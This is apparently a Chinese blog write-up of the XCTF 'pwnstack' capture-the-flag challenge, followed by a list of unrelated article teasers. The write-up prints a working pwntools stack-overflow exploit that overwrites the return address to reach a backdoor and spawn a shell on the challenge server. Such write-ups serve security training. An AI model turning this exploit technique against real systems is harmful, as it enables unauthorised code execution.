攻防世界1

ops/2024/10/22 23:35:53/

pwnstack

发现是64位文件

发现vuln双击进入

看到read知道这里是要将B1(177)的数据输入buf,这里涉及了栈溢出

发现system和binsh

后门

A8十进制是168

exp:

from pwn import *
context(os='linux',arch='amd64',log_level='debug')
io = remote('61.147.171.105','52779')
padding = b'a'*(0xa8)
door = 0x400762
payload = padding + p64(door)
io.sendline(payload)
io.interactive()


http://www.ppmy.cn/ops/124131.html

相关文章

Linux NFS 服务器 搭建

1、安装 NFS 确保Linux联网 sudo apt-get install nfs-kernel-server 2、创建一个目录,并在该文件下创建一个文件,用于测试nfs。 sudo mkdir /nfssudo mkdir /nfs/rootfscd /nfs/rootfs/sudo vim test.txt在里面随便加点内容 esc :wq 保存退出就可以了 …

React 为什么 “虚拟 DOM 顶部有很多 provider“?

1、介绍React中的Context Provider 在 React 中,虚拟 DOM(Virtual DOM)是 React 用来高效更新 UI 的核心机制,它通过对比前后两次虚拟 DOM 树,确定哪些部分需要更新,以减少直接操作真实 DOM 的开销。而 “…

wordpress调用全部页面 排除某个指定ID页面

要在WordPress中调用所有页面并排除指定的ID&#xff0c;您可以使用WP_Query类。以下是一个示例代码&#xff0c;它将查询所有页面并排除指定的页面ID&#xff1a; <?php // Page ID array to exclude $exclude_ids array( 6, 66, 666 ); //Replace here with the page I…

C# Json文件写入、读取 ,Json文件序列化、反序列化

在C#中&#xff0c;处理JSON文件的写入、读取、序列化和反序列化是一个常见的需求&#xff0c;特别是在需要与前端JavaScript应用进行数据交换或配置文件管理的场景中。下面将分别介绍如何使用.NET自带的System.Text.Json命名空间&#xff08;从.NET Core 3.0开始引入&#xff…

mysql学习教程,从入门到精通,SQL 创建视图(CREATE VIEW 语句)(34)

1、SQL 创建视图(CREATE VIEW 语句) 在 SQL 中&#xff0c;CREATE VIEW 语句用于创建一个视图&#xff08;View&#xff09;&#xff0c;视图是一种虚拟表&#xff0c;它基于 SQL 查询的结果集。视图并不存储实际数据&#xff0c;而是存储定义视图的查询。当您查询视图时&…

通过Express + Vue3从零构建一个用户认证与授权系统(一)项目结构设计

项目背景 本文基于 TypeScript Express Vue3 &#xff0c;从零构建一个用户认证与授权管理系统。这个系统的核心部分包括前端、后端和数据库。我们需要确保各部分合理分层、易于维护和扩展&#xff0c;让我们一步步去实现我们的系统。 一、项目结构设计 1. 前端 (Vue 3 E…

2-119 基于matlab的合成孔径雷达(SAR)RDA(距离多普勒算法)、RMA(距离徙动算法)、CSA(线性调频变标算法)算法点目标成像与分析

基于matlab的合成孔径雷达(SAR)RDA(距离多普勒算法)、RMA(距离徙动算法)、CSA(线性调频变标算法)算法点目标成像与分析&#xff0c;RDA算法通过参考目标的多普勒历程完成对应匹配滤波器设计&#xff0c;获得同距离处不同目标相对于参考目标的方位位置。RMA是一种高分辨率的频域…

YOLOv11改进,YOLOv11添加DCNv4可变性卷积(windows系统成功编译),二次创新C2f结构,全网最详细教程

改进训练结果前: 二次创新C2f结构训练结果: 摘要 引入了可变形卷积 v4 (DCNv4),这是一种为广泛视觉应用设计的高效且有效的操作算子。DCNv4通过两项关键增强解决了其前身DCNv3的局限性:1. 移除空间聚合中的softmax归一化,以增强其动态特性和表达能力;2. 优化内存访问以…